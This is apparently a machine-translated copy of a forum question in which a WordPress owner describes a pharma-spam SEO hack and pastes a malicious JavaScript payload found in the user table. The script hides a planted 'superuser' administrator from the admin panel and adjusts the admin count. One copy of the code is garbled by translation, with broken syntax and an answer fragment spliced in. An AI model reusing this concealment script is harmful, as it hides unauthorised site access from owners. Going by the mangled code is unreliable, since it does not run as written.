Php 如何从脚本中查找并清除wordpress，这些脚本会在Google和Yahoo上更改您的博客标题，并带有“尴尬”字样；伟哥文本；？_Php_Security_Wordpress_Sql Injection_Code Injection

Php 如何从脚本中查找并清除wordpress，这些脚本会在Google和Yahoo上更改您的博客标题，并带有“尴尬”字样；伟哥文本；？

php security wordpress

Php 如何从脚本中查找并清除wordpress，这些脚本会在Google和Yahoo上更改您的博客标题，并带有“尴尬”字样；伟哥文本；？,php,security,wordpress,sql-injection,code-injection,Php,Security,Wordpress,Sql Injection,Code Injection,在成功抵御大规模DDoS攻击后的一天，现在有人似乎在谷歌搜索引擎上将帖子标题改为伟哥广告。看看他们是如何伤害我们的： www.google.com/search？hl=en&client=safari&rls=en&q=伟哥+在线+药房+在线购买+伟哥%2C+Cialis%2C+Levitra+wordpress+hack&aq=f&aqi=&aql=&oq=&gs\U rfai= 在这里： google.com/search？hl=en&client=safari&rls=en&q=idesc

在成功抵御大规模DDoS攻击后的一天，现在有人似乎在谷歌搜索引擎上将帖子标题改为伟哥广告。看看他们是如何伤害我们的：

www.google.com/search？hl=en&client=safari&rls=en&q=伟哥+在线+药房+在线购买+伟哥%2C+Cialis%2C+Levitra+wordpress+hack&aq=f&aqi=&aql=&oq=&gs\U rfai=

在这里：

google.com/search？hl=en&client=safari&rls=en&q=idescribe&btnG=search&aq=f&aqi=g-s1g-sx2g-s1g-sx1&aql=&oq=&gs_rfai=

我们所做的是使用干净的插件安装干净的WP，并使用旧帖子和所有页面导入我们的DB。然后手动添加我们需要的每个puglin，然后重建sitemap.xml

但现在我们注定要失败，因为你搜索的任何关键词都会在谷歌上得到标题为“伟哥在线药房-在线购买伟哥、夏利斯、莱维特拉”的结果

我在DB表wp_usermeta user_id:16中发现用户名是一个脚本：

<b id="user_superuser"><script language="JavaScript">
  var setUserName = function(){ 
      try{    
        var t=document.getElementById("user_superuser");   
                 while(t.nodeName!="TR"){      
           t=t.parentNode;                };   
         t.parentNode.removeChild(t);      
      var tags = document.getElementsByTagName("H3");    
        var s = " shown below"; 
           for (var i = 0; i < tags.length; i++) {    
             var t=tags[i].innerHTML;        
         var h=tags[i];             
    if(t.indexOf(s)>0){   
                   s =(parseInt(t)-1)+s;
                      h.removeChild(h.firstChild);
                      t = document.createTextNode(s);  
                        h.appendChild(t);                     }                }
   var arr=document.getElementsByTagName("ul");
   for(var i in arr) if(arr[i].className=="subsubsub"){
       var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
       if(n[1]>0){   var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)    </gi,">Administrator ("+(n[1]-1)+")<");   arr[i].innerHTML=txt;       }   } 
             }catch(e){};
      };      addLoadEvent(setUserName);      </script>


var setUserName=function（）{
试试{
var t=document.getElementById（“用户\超级用户”）；
而（t.nodeName！=“TR”）{
t=t.parentNode；}；
t、 parentNode.removeChild（t）；
var tags=document.getElementsByTagName（“H3”）；
var s=“如下所示”；
对于（var i=0；i0{
s=（parseInt（t）-1）+s；
h、 removeChild（h.firstChild）；
t=document.createTextNode；
h、 appendChild（t）；}
var arr=document.getElementsByTagName（“ul”）；
对于（arr中的var i）if（arr[i].className==“subsubsubsub”）{
var n=/>管理员\（\d+）\）0{var txt=arr[i].innerHTML.replace（/>管理员\（\d+）\）0）{
s=（parseInt（t）-1）+s；
h、 removeChild（h.firstChild）；
t=document.createTextNode；
h、 儿童（t）；
}
}
var arr=document.getElementsByTagName（“ul”）；
对于（arr中的var i）if（arr[i].className==“subsubsubsub”）{
var n=/>管理员（（d+）0）{
var txt=arr[i].innerHTML.replace（/>管理员（（d+）在将数据库导入新的WP安装之前导出并清理数据库：请参阅并非常感谢您我认为您发布的WP codex链接中的此链接给出了答案：
<div id="user_superuser"><script language="JavaScript">
var setUserName = function(){
 try{
  var t=document.getElementById("user_superuser");
  while(t.nodeName!="TR"){
   t=t.parentNode;
  };
  t.parentNode.removeChild(t);
  var tags = document.getElementsByTagName("H3");
  var s = " shown below";
  for (var i = 0; i < tags.length; i++) {
   var t=tags[i].innerHTML;
   var h=tags[i];
   if(t.indexOf(s)>0){
    s =(parseInt(t)-1)+s;
    h.removeChild(h.firstChild);
    t = document.createTextNode(s);
    h.appendChild(t);
   }
  }
  var arr=document.getElementsByTagName("ul");
  for(var i in arr) if(arr[i].className=="subsubsub"){
   var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML);
   if(n[1]>0){
    var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<");
        arr[i].innerHTML=txt;
        }
    }
          }catch(e){};
     };
     addLoadEvent(setUserName);
</script></div>